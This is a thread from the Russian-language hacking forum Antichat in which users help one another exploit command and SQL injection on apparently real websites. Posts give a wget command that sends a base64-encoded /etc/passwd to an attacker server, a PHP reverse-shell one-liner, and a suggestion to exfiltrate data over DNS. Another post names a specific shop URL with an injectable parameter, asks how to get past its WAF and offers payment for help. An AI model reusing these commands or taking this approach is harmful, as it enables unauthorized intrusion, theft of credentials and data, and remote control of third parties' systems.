ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
03.04.2019, 21:26
|
|
Guest
Сообщений: n/a
Провел на форуме:
58046
Репутация:
13
|
|
Сообщение от auth_root
auth_root said:
↑
Покажи на примере плз, как. %7c работает. ls -l | awk 'NR==12' - показать двенадцатую строку из выдачи
|
|
|
|
03.04.2019, 22:06
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893
Репутация:
2163
|
|
auth_root, длина строки ответа различается, можешь попробовать
cat index.php | base64
или перенаправить вывод на свой сервер
wget " http://hek.ru/?log={`cat /etc/passwd | base64`}"
но, логичный вопрос, что мешает тебе запилить бекконект и сидеть в полноценном баше
__________________
Я так же грустен как орангутанг
Сидящей пред галдящею толпою
Суровый житель отогретых стран
Коварно преданный разлуке и покою
Ему и мне насмешница судьба
Дала для жизни крохотную клетку
Нам предстоит в ней долгоя хотьба
За тертую морковь, и за конфетку..
|
|
|
04.04.2019, 00:05
|
|
Новичок
Регистрация: 01.02.2010
Сообщений: 12
Провел на форуме:
52455
Репутация:
18
|
|
Сообщение от BillyBons
BillyBons said:
↑
ls -l | awk 'NR==12' - показать двенадцатую строку из выдачи Да, так работает, спасибо. =) Чуствую спалят раньше, чем я переберу эту огромную массу информации построчно.
Сообщение от l1ght
l1ght said:
↑
auth_root
, длина строки ответа различается, можешь попробовать
cat index.php | base64
или перенаправить вывод на свой сервер
wget "
http://hek.ru/?log=
{`cat /etc/passwd | base64`}"
но, логичный вопрос, что мешает тебе запилить бекконект и сидеть в полноценном баше wget (maybe в моих кривых руках) не работает. Base64 так же выводит всего по одной строке еще и обрезаной. Как запилить бэкконнект? Добавить в файл? Не редачит он существующие, пустые не создает, wget и curl не воркает у меня. Я Очень давно этим не занимался. Тут подбили края
|
|
|
|
04.04.2019, 00:18
|
|
Guest
Сообщений: n/a
Провел на форуме:
238786
Репутация:
40
|
|
Сообщение от l1ght
l1ght said:
↑
auth_root
, длина строки ответа различается, можешь попробовать
cat index.php | base64
или перенаправить вывод на свой сервер
wget "
http://hek.ru/?log=
{`cat /etc/passwd | base64`}"
но, логичный вопрос, что мешает тебе запилить бекконект и сидеть в полноценном баше Ты натолкнул на идею. через днс на свой сервак. dig то есть в линухе
|
|
|
|
04.04.2019, 00:27
|
|
Новичок
Регистрация: 01.02.2010
Сообщений: 12
Провел на форуме:
52455
Репутация:
18
|
|
Сообщение от BabaDook
BabaDook said:
↑
Ты натолкнул на идею. через днс на свой сервак. dig то есть в линухе Как реализовать, покажите плз неумному =(
|
|
|
|
04.04.2019, 04:07
|
|
Guest
Сообщений: n/a
Провел на форуме:
3935
Репутация:
3
|
|
Сообщение от auth_root
auth_root said:
↑
Как запилить бэкконнект?
Код:
Code:
php -r '$sock=fsockopen("127.0.0.1",65536);exec("/bin/sh -i &3 2>&3");'
|
|
|
|
04.04.2019, 09:30
|
|
Guest
Сообщений: n/a
Провел на форуме:
47768
Репутация:
119
|
|
Ну вообще, там речь про системные команды, а не php RCE )
|
|
|
|
04.04.2019, 22:42
|
|
Guest
Сообщений: n/a
Провел на форуме:
97114
Репутация:
24
|
|
Чем искать NoSQL Injection сканер бурпа умеет? есть расширения под ним?
|
|
|
|
05.04.2019, 02:09
|
|
Новичок
Регистрация: 26.05.2007
Сообщений: 8
Провел на форуме:
23906
Репутация:
-5
|
|
Сообщение от kacergei
kacergei said:
↑
Можете пожалуйста подсказать по данной sql-injection:
Код:
Code:
igum.com.ua/index.php?route=product/search_auto&tab=all_tire&height=5&diameter=6&season=%D0%B2%D1%81%D0%B5%D1%81%D0%B5%D0%B7%D0%BE%D0%BD%D0%BD%D0%B0%D1%8F&type=%D0%B2%D0%BD%D0%B5%D0%B4%D0%BE%D1%80%D0%BE%D0%B6%D0%BD%D0%B8%D0%BA&brand=68&autotype=all&width=1
Параметр: width
Через sqlmap не удалось что с тамперами, что без
Пробовал в ручную, но так и не сообразил как обойти и что конкретно фильтруется
обратил внимание что фильтрует
AND
,
OR и что то еще =( хотя могу ошибаться
Может кто-то уже сталкивался с WAF'ом данного хостера( hostsila
А то уже третий хост попадается этот и как в стену(( Может кто подскажет по данному вопросу?
PS: В какой ветке можно разместить пост, из разряда помощь со скулей, скину на пиво(
А то подобных тем не видел в услугах(
|
|
|
|
05.04.2019, 19:56
|
|
Guest
Сообщений: n/a
Провел на форуме:
3935
Репутация:
3
|
|
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
